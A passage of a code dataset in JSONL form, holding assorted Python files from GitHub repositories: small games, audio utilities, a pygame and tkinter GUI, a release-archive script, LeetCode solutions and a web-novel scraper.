computer):\n print (f\"You chose {player} and computer chose {computer}.\")\n if player == computer:\n return \"It's a tie\"\n elif player == \"rock\":\n if computer == \"scissors\":\n return \"Rock smashes scissors! You Win. Congratulations!\"\n else:\n return \"Paper covers the rock! Unfortunately, computer wins this time.\"\n elif player == \"paper\":\n if computer == \"scissors\":\n return \"Scissors cuts the paper! Unfortunately, computer wins this time.\"\n else:\n return \"Paper covers the rock! You Win. Congratulations!\"\n elif player == \"scissors\":\n if computer == \"rock\":\n return \"Rock smashes scissors! Unfortunately, computer wins this time.\"\n else:\n return \"Scissors cuts the paper! You Win. Congratulations!\"\n\nchoices = get_choices()\nresult = check_win(choices[\"player\"], choices[\"computer\"])\nprint(result)\n\n","repo_name":"harsha-bhojaiah/Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6458112925","text":"from .abstract_favicon_group import AbstractFaviconGroup\n\nBROWSER_TARGET_SIZES = [(16, 16), (32, 32), (48, 48)]\n\n\nclass FaviconGroupStandard(AbstractFaviconGroup):\n def __init__(self, conf, outdir):\n super().__init__(conf, outdir)\n self.sizes = BROWSER_TARGET_SIZES\n self.filename_schema = 'favicon-{}x{}.png'\n\n def generate_images(self, favicon):\n self.generate_image(favicon, image_format='ICO',\n filename='favicon.ico')\n super().generate_images(favicon)\n","repo_name":"maxdup/flask-favicon","sub_path":"flask_favicon/groups/favicon_standard.py","file_name":"favicon_standard.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17763010133","text":"#!/usr/bin/env python\n__author__ = 'David Moser - david.moser@bitmovin.net'\n\nimport bitcodin\n\nbitcodin.api_key = 'YOUR API KEY'\n\ninput_obj = bitcodin.Input(url='http://url.to.video.with.closed.captions')\ninput_result = bitcodin.create_input(input_obj)\n\nvideo_configs = list()\n\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=4800000,\n profile='Main',\n preset='premium',\n height=1080,\n width=1920\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=2400000,\n profile='Main',\n preset='premium',\n height=768,\n width=1024\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=1200000,\n profile='Main',\n preset='premium',\n height=480,\n width=854\n))\n\naudio_configs = [\n bitcodin.AudioStreamConfig(default_stream_id=0, bitrate=192000),\n bitcodin.AudioStreamConfig(default_stream_id=1, bitrate=192000)\n]\n\nencoding_profile_obj = bitcodin.EncodingProfile('API Test Profile Closed Captions', video_configs, audio_configs)\nencoding_profile_result = bitcodin.create_encoding_profile(encoding_profile_obj)\n\nmanifests = ['mpd', 'm3u8']\n\naudio_meta_data = [\n bitcodin.AudioMetaData(0, 'Spanish', 'es'),\n bitcodin.AudioMetaData(1, 'English', 'en')\n]\n\nvideo_meta_data = [\n bitcodin.VideoMetaData(0, 'Spanish', 'es')\n]\n\njob = bitcodin.Job(\n input_id=input_result.input_id,\n encoding_profile_id=encoding_profile_result.encoding_profile_id,\n manifest_types=manifests,\n speed='standard',\n extract_closed_captions=True,\n audio_meta_data=audio_meta_data,\n video_meta_data=video_meta_data\n)\n\njob_result = bitcodin.create_job(job)\n","repo_name":"bitmovin/bitcodin-python","sub_path":"examples/create_job_closed_captions_multiple_audio_streams.py","file_name":"create_job_closed_captions_multiple_audio_streams.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"15078699485","text":"def time_stretch(audio, factor, sample_rate=44100):\n import pyrubberband as pyrb\n return pyrb.time_stretch(audio, sample_rate, factor)\n\n\ndef load_audio(filepath):\n # returns loaded mono audio.\n from essentia.standard import MonoLoader\n return MonoLoader(filename=filepath)()\n\n\ndef save_audio(audio, filename, file_format='wav', bit_rate=320):\n from essentia.standard import MonoWriter\n MonoWriter(filename=filename, bitrate=bit_rate, format=file_format)(audio)\n\n\ndef does_annotations_folder_exist(folder_name='pycrossfade_annotations'):\n from os.path import isdir\n return isdir(folder_name)\n\n\ndef create_annotations_folder(folder_name='pycrossfade_annotations'):\n from os import mkdir\n if not does_annotations_folder_exist(folder_name):\n mkdir(folder_name)\n return True\n return False\n\n\ndef path_to_annotation_file(annt_folder_name, file_name, file_format='txt'):\n from os.path import join\n return join(annt_folder_name, file_name + '.' + file_format) \n\n\ndef linear_fade_volume(audio, start_volume=0.0, end_volume=1.0):\n import numpy as np\n\n if start_volume == end_volume:\n return audio\n\n length = audio.size\n profile = np.sqrt(np.linspace(start_volume, end_volume, length))\n return audio * profile\n\n\ndef linear_fade_filter(audio, filter_type, start_volume=0.0, end_volume=1.0):\n from yodel.filter import Biquad\n import numpy as np\n from scipy.signal import lfilter\n\n if start_volume == end_volume:\n return audio\n\n SAMPLE_RATE = 44100\n LOW_CUTOFF = 70\n MID_CENTER = 1000\n HIGH_CUTOFF = 13000\n Q = 1.0 / np.sqrt(2)\n NUM_STEPS = 20 if start_volume != end_volume else 1\n\n bquad_filter = Biquad()\n length = audio.size # Assumes mono audio\n\n profile = np.linspace(start_volume, end_volume, NUM_STEPS)\n output_audio = np.zeros(audio.shape)\n\n for i in range(NUM_STEPS):\n start_idx = int((i / float(NUM_STEPS)) * length)\n end_idx = int(((i + 1) / float(NUM_STEPS)) * length)\n if filter_type == 'low_shelf':\n bquad_filter.low_shelf(SAMPLE_RATE, LOW_CUTOFF, Q, -int(26 * (1.0 - profile[i])))\n elif filter_type == 'high_shelf':\n bquad_filter.high_shelf(SAMPLE_RATE, HIGH_CUTOFF, Q, -int(26 * (1.0 - profile[i])))\n else:\n raise Exception('Unknown filter type: ' + filter_type)\n # ~ bquad_filter.process(audio[start_idx : end_idx], output_audio[start_idx : end_idx]) # This was too slow, code beneath is faster!\n b = bquad_filter._b_coeffs\n a = bquad_filter._a_coeffs\n a[\n 0] = 1.0 # Normalizing the coefficients is already done in the yodel object, but a[0] is never reset to 1.0 after division!\n output_audio[start_idx: end_idx] = lfilter(b, a, audio[start_idx: end_idx]).astype('float32')\n\n return output_audio","repo_name":"oguzhan-yilmaz/pyCrossfade","sub_path":"pycrossfade/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"53"} +{"seq_id":"39162893624","text":"from typing import List\n\n\nclass MajorityChecker:\n\n def __init__(self, arr: List[int]):\n self.t = dict(list)\n for j in range(len(arr)):\n self.t[arr[j]].append(j) # 按顺序遍历数组,每个元素的下标数组就自然是有序,可以直接二分\n self.arr = arr\n\n def query(self, left: int, right: int, threshold: int) -> int:\n print(self.arr)\n\n\nif __name__ == '__main__':\n z = [1, 1, 2, 2, 1, 1]\n obj = MajorityChecker(z)\n print(obj.query(0, 5, 4))\n\n# Your MajorityChecker object will be instantiated and called as such:\n# obj = MajorityChecker(arr)\n# param_1 = obj.query(left,right,threshold)\n","repo_name":"BiqiangWang/leetcode","sub_path":"daily/1157.py","file_name":"1157.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14285539534","text":"import pygame\nfrom pygame.sprite import Sprite\nimport string\n\nclass Sidebar(Sprite):\n def __init__(self, screen, contents, bckgrd, pos, horizontal):\n self.screen = screen\n self.contents = contents\n self.image = pygame.image.load(bckgrd)\n self.image_w, self.image_h = self.image.get_size()\n self.pos = pos\n self.horizontal = horizontal # True == Horizontal, False == Vertical\n self.direction = 0 # Initial direction (Going on/off first)\n self.speed = 0.1\n self.move = False\n #self.set_contents()\n\n def scroll_LU(self):\n self.move = True\n self.direction = -1\n\n def scroll_RD(self):\n self.move = True\n self.direction = 1 \n\n def set_contents(self):\n TOP = self.pos[1] - (self.image_h/2)\n BOTTOM = self.pos[1] + (self.image_h/2)\n LEFT = self.pos[0] + (self.image_w/2)\n RIGHT = self.pos[0] + (self.image_w/2)\n for i in range(len(self.contents)):\n if(self.layout[i] == \"TOP\"):\n self.contents[i].pos = (self.pos[0], TOP + (self.contents[i].image_h/2))\n \n def update(self, interact):\n time_passed = interact[8]\n mouse_pos = interact[7]\n click = interact[0]\n # if bar is moving\n if(self.move):\n x_diff = 0\n y_diff = 0\n\n inner_rect = self.screen.get_rect().inflate(-self.image_w,-self.image_h)\n outer_rect = self.screen.get_rect().inflate(self.image_w, self.image_h)\n\n if(self.horizontal):\n new_pos = (self.pos[0] + (time_passed * self.speed * self.direction), self.pos[1])\n x_diff = self.pos[0] - new_pos[0]\n if((new_pos[0] < inner_rect.left)and(new_pos[0] > outer_rect.left)):\n pass\n elif((new_pos[0] > inner_rect.right)and(new_pos[0] < outer_rect.right)):\n pass\n else:\n self.move = False\n new_pos = self.pos\n x_diff = 0\n else:\n new_pos = (self.pos[0], self.pos[1] + (time_passed * self.speed * self.direction))\n y_diff = self.pos[1] - new_pos[1]\n if((new_pos[1] < inner_rect.top)and(new_pos[1] > outer_rect.top)):\n pass\n elif((new_pos[1] > inner_rect.bottom)and(new_pos[1] < outer_rect.bottom)):\n pass\n else:\n self.move = False\n new_pos = self.pos\n y_diff = 0\n\n self.pos = new_pos\n for c in self.contents:\n c.pos = (c.pos[0] - x_diff, c.pos[1] - y_diff)\n c.update(interact)\n else:\n for c in self.contents:\n c.update(interact)\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image,draw_pos)\n\n for c in self.contents:\n c.blitme()\n\nclass Acc_Bar(Sprite):\n\n def __init__(self, screen, pos, owner):\n self.screen = screen\n self.pos = pos\n self.owner = owner\n self.font = pygame.font.Font(None, 40)\n self.font2 = pygame.font.Font(None, 60)\n\n def update(self, interact):\n pass\n\n def blitme(self):\n back = pygame.Surface((300, 150))\n back.fill(self.owner.color)\n back.set_alpha(90)\n draw_pos = (self.pos[0] - 150, self.pos[1] - 75)\n self.screen.blit(back, draw_pos)\n\n if(self.owner.alias != None):\n t_pos = (self.pos[0]-145, self.pos[1] - 75)\n if(self.owner.color[0]+self.owner.color[1]+self.owner.color[2] < 25):\n self.screen.blit(self.font2.render(self.owner.alias, True, self.owner.inv_col), t_pos)\n else:\n self.screen.blit(self.font2.render(self.owner.alias, True, (0,0,0)), t_pos)\n t_pos = (self.pos[0]+50, self.pos[1] - 25)\n self.screen.blit(self.font.render(str(self.owner.record), True, (0,0,0)),t_pos)\n t_pos = (self.pos[0]+50, self.pos[1] + 25)\n self.screen.blit(self.font.render(str(self.owner.XP), True, (0,0,0)),t_pos)\n t_pos = (self.pos[0] - 50, self.pos[1] + 25)\n self.owner.dog_tag.display(self.screen, t_pos) \n \n\n\nclass Button(Sprite):\n\n def __init__(self, screen, images, pos, event, param):\n self.screen = screen\n self.pos = pos\n self.image_base = pygame.image.load(images[0])\n self.image_hover = pygame.image.load(images[1])\n self.image = self.image_base\n self.image_w, self.image_h = self.image.get_size()\n self.event = event\n self.param = param\n self.clicked = False\n self.ready = False\n\n def do(self):\n if(self.param == None):\n self.event()\n else:\n self.event(self.param)\n\n def hover(self, position):\n if((self.pos[0] - (self.image_w/2) < position[0])and\n (self.pos[0] + (self.image_w/2) > position[0])):\n if((self.pos[1] - (self.image_h/2) < position[1])and\n (self.pos[1] + (self.image_h/2) > position[1])):\n return True\n else:\n return False\n else:\n return False\n\n def update(self, interact):\n mouse_pos = interact[7]\n click = interact[0]\n if(self.clicked == False):\n if(self.hover(mouse_pos)):\n self.image = self.image_hover\n if(click):\n if(self.ready):\n self.clicked = True\n self.do()\n else:\n self.ready = True\n else:\n self.image = self.image_base\n self.ready = False\n else:\n if((self.hover(mouse_pos) == False)or(click == False)):\n self.clicked = False\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image, draw_pos)\n\n\nclass DummyBlob(Sprite):\n\n def __init__(self, screen, image, pos):\n self.screen = screen\n self.pos = pos\n self.image = pygame.image.load(image)\n self.image_w, self.image_h = self.image.get_size()\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image, draw_pos)\n\nclass SmartSquare(Sprite):\n def __init__(self, screen, pos, size, acc):\n self.screen = screen\n self.pos = pos\n self.size = size\n self.acc = acc\n self.surf = pygame.Surface(size)\n self.surf.fill(acc.color)\n\n def update(self, interact):\n self.surf = pygame.Surface(self.size)\n self.surf.fill(self.acc.color)\n\n def blitme(self):\n draw_pos = (self.pos[0] - self.size[0]/2, self.pos[1] - self.size[1]/2)\n self.screen.blit(self.surf, draw_pos)\n\n\nclass Text_Box(Sprite):\n\n def __init__(self, screen, size, pos, prompt, prop):\n pygame.font.init()\n self.screen = screen\n self.size = size\n self.pos = pos\n self.prop = prop\n self.active = False\n self.base_prompt = prompt\n self.active_prompt = prompt.upper()\n self.prompt = self.base_prompt\n self.font = pygame.font.Font(None, 20)\n self.text = []\n self.hidden = False\n\n def hover(self, position):\n if((self.pos[0] - (self.size[0]/2) < position[0])and\n (self.pos[0] + (self.size[0]/2) > position[0])):\n if((self.pos[1] - (self.size[1]/2) < position[1])and\n (self.pos[1] + (self.size[1]/2) > position[1])):\n return True\n else:\n return False\n else:\n return False\n\n def get_text(self):\n message = \"\"\n for t in self.text:\n message += t\n return message\n\n def set_text(self, message):\n if(message != None):\n self.text = []\n for i in range(len(message)):\n self.text.append(message[i])\n\n def update(self, interact):\n mouse_pos = interact[7]\n click = interact[0]\n inkey = interact[3]\n shift = interact[4]\n back = interact[5]\n enter = interact[6]\n\n if(self.active == False):\n self.prompt = self.base_prompt\n if((self.hover(mouse_pos))and(click)):\n self.active = True\n else:\n self.prompt = self.active_prompt\n if(enter):\n self.active = False\n self.prop(self.get_string())\n elif(back):\n self.text = self.text[0:-1]\n elif(inkey != None):\n if((shift)and(inkey >= 97)and(inkey <= 122)):\n self.text.append(chr(inkey-32))\n else:\n self.text.append(chr(inkey))\n\n if((click)and(self.hover(mouse_pos) == False)):\n self.active = False\n self.prop(self.get_string())\n\n def get_string(self):\n message = \"\"\n if(self.hidden):\n for i in range(len(self.text)):\n message += \"X\"\n else:\n message = self.get_text()\n\n return message\n\n def blitme(self):\n \n frame = pygame.Surface(self.size)\n frame.fill((250,0,0))\n t_pos = (self.pos[0]-(self.size[0]/2), self.pos[1]-(self.size[1]/2))\n self.screen.blit(frame, t_pos)\n \n box = pygame.Surface((self.size[0]-2, self.size[1]-2))\n box.fill((0,0,0))\n t_pos = (self.pos[0]-(self.size[0]/2)+1, self.pos[1]-(self.size[1]/2)+1)\n self.screen.blit(box, t_pos)\n\n t_pos = (self.pos[0] - (self.size[0]/2), self.pos[1] - (self.size[1]/2) - 12)\n self.screen.blit(self.font.render(self.prompt, True, (0,0,0)), t_pos)\n \n t_pos = (self.pos[0]-(self.size[0]/2)+3, self.pos[1]-(self.size[1]/2)+3) \n self.screen.blit(self.font.render(self.get_string(), True, (255,255,255)), t_pos)\n\nclass grande_door:\n def __init__(self, screen, size, event):\n enter_images = ('buttons//enter1.png', 'buttons//enter2.png')\n self.width = size[0]\n self.height = size[1]\n self.left = Sidebar(screen, [], 'images//door.png', (-512, self.height/2), True)\n self.right = Sidebar(screen, [], 'images//door.png', (self.width + 512, self.height/2), True)\n self.left.speed = 0.5\n self.right.speed = 0.5\n self.opening = False\n self.closing = False\n self.butt_enable = False\n self.butt = Button(screen, enter_images, (self.width/2, self.height/2), event, None)\n\n def close(self):\n self.left.scroll_RD()\n self.right.scroll_LU()\n self.closing = True\n\n def split(self):\n self.left.scroll_LU()\n self.right.scroll_RD()\n self.butt_enable = False\n self.opening = True\n\n def is_closed(self):\n if((self.left.pos[0] == 0)and(self.right.pos[0] == self.width)):\n return True\n else:\n return False\n\n def shut(self):\n if((self.left.pos[0] >= 0)and(self.right.pos[0] <= self.width)):\n self.left.move = False\n self.right.move = False\n self.left.pos = (0, self.height/2)\n self.right.pos = (self.width, self.height/2)\n self.butt_enable = True\n self.closing = False\n\n def jam(self):\n if((self.left.pos[0] <= -512 )and(self.right.pos[0] >= self.width + 512)):\n self.left.move = False\n self.right.move = False\n self.opening = False\n\n def update(self, interact):\n if(self.closing):\n self.shut()\n elif(self.opening):\n self.jam()\n self.right.update(interact)\n self.left.update(interact)\n if(self.butt_enable):\n self.butt.update(interact)\n\n def blitme(self):\n self.right.blitme()\n self.left.blitme()\n if(self.butt_enable):\n self.butt.blitme()\n \n \n\n\n","repo_name":"Dirker27/GamesBrowser","sub_path":"Items.py","file_name":"Items.py","file_ext":"py","file_size_in_byte":12217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73116680167","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport glob\nimport zipfile\nimport argparse\nimport subprocess\n\n\nINCLUDE_GLOBS = [\n # documentation\n 'README.md',\n 'LICENSE.MIT',\n 'docs/*.md',\n 'docs/jxc_syntax.jxc',\n\n # editor syntax highlighting packages\n 'contrib/*/*',\n 'contrib/*.md',\n]\n\n\ndef append_filename(file_path: str, value: str) -> str:\n \"\"\"\n Adds a string to the end of a filename, inserting it just _before_ the file's extension.\n Ex. append_filename('/a/b/c/release.zip', '_1.0') == '/a/b/c/release_1.0.zip'\n \"\"\"\n file_dir, file_name = os.path.split(file_path)\n if file_name.startswith('.'):\n return os.path.join(file_dir, f'.{file_name[1:]}{value}')\n elif file_name.endswith('.'):\n return os.path.join(file_dir, f'{file_name[:-1]}{value}.')\n elif '.' not in file_name:\n return os.path.join(file_dir, f'{file_name}{value}')\n\n parts = file_name.split('.')\n assert len(parts) >= 2\n ext = parts[-1]\n parts = parts[:-1]\n parts[-1] += str(value)\n return os.path.join(file_dir, '.'.join(parts + [ext]))\n\n\ndef make_release(jxc_version: str, repo_root: str, output_path: str, amal_core_path: str, amal_cpp_path: str):\n output_path = append_filename(output_path, f'_{jxc_version}')\n zip_base_dir = f'jxc_{jxc_version}'\n\n with zipfile.ZipFile(output_path, 'w', compression=zipfile.ZIP_DEFLATED, compresslevel=9) as zf:\n for inc_glob in INCLUDE_GLOBS:\n print(repr(inc_glob))\n for path in glob.glob(os.path.join(repo_root, inc_glob)):\n file_rel_path = os.path.join(zip_base_dir, os.path.relpath(path, repo_root))\n zf.write(path, file_rel_path)\n print('\\t', repr(path), ' --> ', repr(file_rel_path))\n\n print('amalgamated_core')\n for filename in os.listdir(amal_core_path):\n file_path = os.path.join(amal_core_path, filename)\n file_zip_path = os.path.join(zip_base_dir, 'amalgamated_core_only', 'jxc', filename)\n print('\\t', repr(file_path), ' --> ', repr(file_zip_path))\n zf.write(file_path, file_zip_path)\n\n print('amalgamated_cpp')\n for filename in os.listdir(amal_cpp_path):\n file_path = os.path.join(amal_cpp_path, filename)\n file_zip_path = os.path.join(zip_base_dir, 'amalgamated_core_and_cpp_lib', 'jxc', filename)\n print('\\t', repr(file_path), ' --> ', repr(file_zip_path))\n zf.write(file_path, file_zip_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--source', type=str, help='Repo root directory')\n parser.add_argument('--amalgamated-core', type=str, help='Path to the amalgamated core build')\n parser.add_argument('--amalgamated-cpp', type=str, help='Path to the amalgamated cpp build')\n parser.add_argument('--output', type=str, help='Output zip file path')\n args = parser.parse_args()\n\n repo_root: str = os.path.abspath(args.source)\n if not os.path.exists(repo_root):\n raise FileNotFoundError(repo_root)\n\n amal_core: str = os.path.abspath(args.amalgamated_core)\n if not os.path.exists(amal_core):\n raise FileNotFoundError(amal_core)\n\n amal_cpp: str = os.path.abspath(args.amalgamated_cpp)\n if not os.path.exists(amal_cpp):\n raise FileNotFoundError(amal_cpp)\n\n output_path: str = os.path.abspath(args.output)\n assert not output_path.endswith('/')\n output_path_parent = os.path.dirname(output_path)\n if not os.path.exists(output_path_parent):\n output_path_parent_parent = os.path.dirname(output_path_parent)\n if os.path.exists(output_path_parent_parent) and os.path.isdir(output_path_parent_parent):\n os.makedirs(output_path_parent, exist_ok=True)\n else:\n raise ValueError(f\"Output path parent directory {output_path_parent_parent} does not exist\")\n\n # read the release version from the repo\n jxc_version = subprocess.check_output([ sys.executable, os.path.join(repo_root, 'tools', 'version.py') ]).strip().decode('utf-8')\n assert len(jxc_version) > 0 and len(jxc_version.split('.')) == 3\n\n make_release(jxc_version, repo_root, output_path, amal_core, amal_cpp)\n","repo_name":"juddc/jxc","sub_path":"tools/make_release_archive.py","file_name":"make_release_archive.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"53"} +{"seq_id":"30617207413","text":"class Solution(object):\n def myAtoi(self, str):\n \"\"\"\n :type str: str\n :rtype: int\n \"\"\"\n \n # discard extra white space\n atoi_string = str.strip()\n \n INT_MAX = 2147483649\n INT_MIN = -(INT_MAX - 1)\n sign = [\"-\", \"+\"]\n \n result = \"\"\n \n for index, char in enumerate(list(atoi_string)):\n if index == 0:\n if char.isdigit() or char in sign:\n result += char\n else: \n return 0\n else:\n if char.isdigit():\n result += char\n else:\n break\n \n num = int(result) \n if num < INT_MIN or num > INT_MAX:\n return INT_MIN if num < 0 else INT_MAX\n \n return num\n\ns = Solution()\nprint(s.myAtoi(\"42\"))\nprint(s.myAtoi(\"4193 with words\"))\nprint(s.myAtoi(\"42\"))\nprint(s.myAtoi(\"42\"))","repo_name":"rakontuh/algorithms","sub_path":"Algorithms/Stanford/week-1/atoi.py","file_name":"atoi.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"17285293095","text":"# Importamos los módulos necesarios\nimport tkinter as tk\nfrom tkinter import *\nimport customtkinter\nfrom customtkinter import CTkEntry, CTkButton\nfrom ttkthemes import ThemedTk\nfrom tkinter import PhotoImage\nfrom PIL import ImageTk, Image\nimport customtkinter as ctk\nfrom menu_registro import *\nfrom funciones2 import *\nfrom menu_pagos import *\nfrom consulta import *\n#from funct import *\nfrom cobranza import*\n# Creamos una ventana principal\nroot = ctk.CTk()\n\nroot.title(\"LS Software\")\nroot.geometry(\"1366x768+1+1\")\n#title_label = Label(root, text=\"LS Software\")\n\nroot.config(background=\"gray21\")\n\n# Creamos un canvas con un color de fondo y sin bordes\ncanvas = tk.Canvas(root, width=1280, height=720, bg=\"gray21\",\n highlightthickness=0)\ncanvas.pack()\n\n# Cargamos una imagen desde un archivo\n#imagen = Image.open(\"image.png\")\n# La convertimos a un formato compatible con tkinter\nphoto = PhotoImage(file=\"image.png\")\n# Creamos una imagen sobre el canvas con la foto cargada\ncanvas_image = canvas.create_image(650, 270, image=photo, anchor=CENTER)\n\nwindow = root\n# creacion del entry\nentry = ctk.CTkEntry(window, width=285, height=38,\n fg_color=\"snow2\", text_color=\"black\",\n font=(\"arial\", 20), placeholder_text=\"ej: 18123456\",\n justify=\"center\")\n# aqui la ubicamos:\nentry.place(x=676, y=621, anchor=CENTER)\n\n#funciones para bottones\ndef agregar():\n cedula = entry.get()\n print(\"accion para registrar pago de mensualidad: \" + cedula)\n\ndef buscar():\n cedula = entry.get()\n print(\"accion para buscar estado de cuenta del representante: \"\n + cedula)\n\n#Boton de agregar para registrar pagos de mensualidades\n\nadd_button = CTkButton(window, text=\"Agregar\", font=(\"arial\", 16),\n anchor=CENTER, width=10, command=agregar)\nadd_button.place(x=685, y=657, anchor=CENTER)\n\n#buscar_button = busqueda con la CI para ver estado de cuenta del representante\nbuscar_button = CTkButton(window, text=\"Buscar\",\n font=(\"arial\", 16),\n width=10, height=37, command=buscar)\nbuscar_button.place(x=855, y=621, anchor=CENTER)\n\n# Crear una instancia de Menu\nmenu_bar = Menu(root, background=\"black\")\n# Asignar la barra de menú a la ventana\nroot.config(menu=menu_bar)\n\n# Crear un elemento de menú \"Archivo\"\narchivo_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"ARCHIVO\", font=(\"calibri\", 18),\n menu=archivo_menu)\n\narchivo_menu.add_command(label=\"Nuevo\", command=nuevo)\narchivo_menu.add_command(label=\"Abrir\",command=abrir )\narchivo_menu.add_command(label=\"Importar\", command=importar)\narchivo_menu.add_command(label=\"Exportar\", command=exportar)\narchivo_menu.add_separator()\narchivo_menu.add_command(label=\"Salir\", command=root.quit)\n\n# Agregar el elemento de menú \"Registro\" a la barra de menú\nregistro_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"REGISTRO\", menu=registro_menu)\n\nregistro_menu.add_command(label=\"Representante\", command=representante)\nregistro_menu.add_command(label=\"Alumno\", command=alumno)\nregistro_menu.add_command(label=\"opcion 3\", command=opcion)\n\n# construccion del menu PAGOS\npagos_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"PAGOS\", menu=pagos_menu)\n\npagos_menu.add_command(label=\"Inscripcion\",command=inscripcion)\n\npagos_menu.add_command(label=\"Mensualidad\",command=pago_mensualidad)\n\n\npagos_menu.add_command(label=\"Cierre Diario\", command=cierre)\npagos_menu.add_command(label=\"Facturas\")\n\n# Agregar el elemento \"CONSULTAS\" a la barra de menú\nconsultas_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\n#creating cascade\nmenu_bar.add_cascade(label=\"CONSULTAS\", menu=consultas_menu)\n#creating elements for cascade\nconsultas_menu.add_command(label=\"Info Representante\",command=consulta_representante)\nconsultas_menu.add_command(label=\"Info Alumnos\",command=consulta_alumnos)\n#CREAR SUB_MENU MOROSIDAD\nmorosidad_menu = Menu(consultas_menu, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmorosidad_menu.add_command(label=\"Por Alumno\",command=consulta_alumnos)\nmorosidad_menu.add_command(label=\"Por curso\",command=consulta_curso)\nmorosidad_menu.add_command(label=\"TOTAL\")\nconsultas_menu.add_cascade(label=\"MOROSIDAD\", menu=morosidad_menu)\nconsultas_menu.add_command(label=\"opcion 4\") #extra option\n\n# Agregar cuentas por cobrar\ncobranza_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"COBRANZA\", menu=cobranza_menu)\n\ncobranza_menu.add_command(label=\"Por Alumno\",command=cobranza_alumno)\ncobranza_menu.add_command(label=\"Por curso\",command=cobranza_curso)\ncobranza_menu.add_command(label=\"TOTAL\")\n\n# Iniciamos el bucle principal de la ventana\nroot.mainloop()","repo_name":"jossephtrump/ventanas","sub_path":"mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33016458718","text":"# -*- coding= utf-8 -*-\n# @Time : 2021-04-15 8:40\n# @Author : baoguo\n# @File : Day6-小说爬虫实战.py\n# @Software : PyCharm\nimport urllib.request, urllib.error\nfrom bs4 import BeautifulSoup\nimport xlwt\nimport re\nimport sqlite3\nimport gzip\nfrom io import BytesIO\n\n'''\n 需求:小说爬取 \n url = \"http://www.biquku.la/0/421/\" \n 数据爬取出现UnicodeDecodeError: \n 'utf-8' codec can't decode byte 0x8b in position 1: invalid start byte错误\n 是因为Accept-Encoding: gzip, deflate \n 需要通过gzip、BytesIO进行解压缩\n '''\n\n\ndef main():\n url = \"http://www.biquku.la/0/421/\"\n getData(url)\n # askURL(url)\n\n\nPageUrl = re.compile(r'.*')\ntName = re.compile(r'

    (.*)

    ', re.S)\ntData = re.compile(r'
    (.*?)
    ')\n\n\ndef getData(url):\n list = getUrl(url)\n for i in range(len(list)):\n newUrl = \"\"\n newUrl = url + str(list[i])\n html = askURL(newUrl)\n btf = BeautifulSoup(html, \"html.parser\")\n for item in btf.find_all('div', class_='content_read'):\n item = str(item)\n tname = re.findall(tName, item)[0]\n tdata = re.findall(tData, item)\n with open(\"DouLuoDaLu/\" + tname + '.txt', 'w', encoding='utf-8') as f:\n for data in tdata:\n data = \"\".join(data.split())\n f.write(data.replace('

    ', '\\n').strip())\n print(\"%s 下载成功\" % tname)\n print(\"下载成功\")\n\n\ndef getUrl(url):\n urlList = []\n html = askURL(url)\n btf = BeautifulSoup(html, \"html.parser\")\n item = btf.find_all(id=\"list\")\n item = str(item)\n pageurl = re.findall(PageUrl, item)\n for i in pageurl:\n urlList.append(i)\n return urlList\n\n\ndef askURL(url):\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/89.0.4389.90 Safari/537.36 \"\n }\n req = urllib.request.Request(url, headers=head)\n html = \"\"\n try:\n resp = urllib.request.urlopen(req)\n html = resp.read()\n buff = BytesIO(html)\n f = gzip.GzipFile(fileobj=buff)\n html = f.read().decode(\"utf-8\")\n except Exception as result:\n print(result)\n return html\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"S180231891/PaChong","sub_path":"Day6-小说爬虫实战.py","file_name":"Day6-小说爬虫实战.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35346275786","text":"import pandas as pd\nimport sys, os\nfrom datetime import date, datetime\n\nif len(sys.argv) == 1:\n raw = 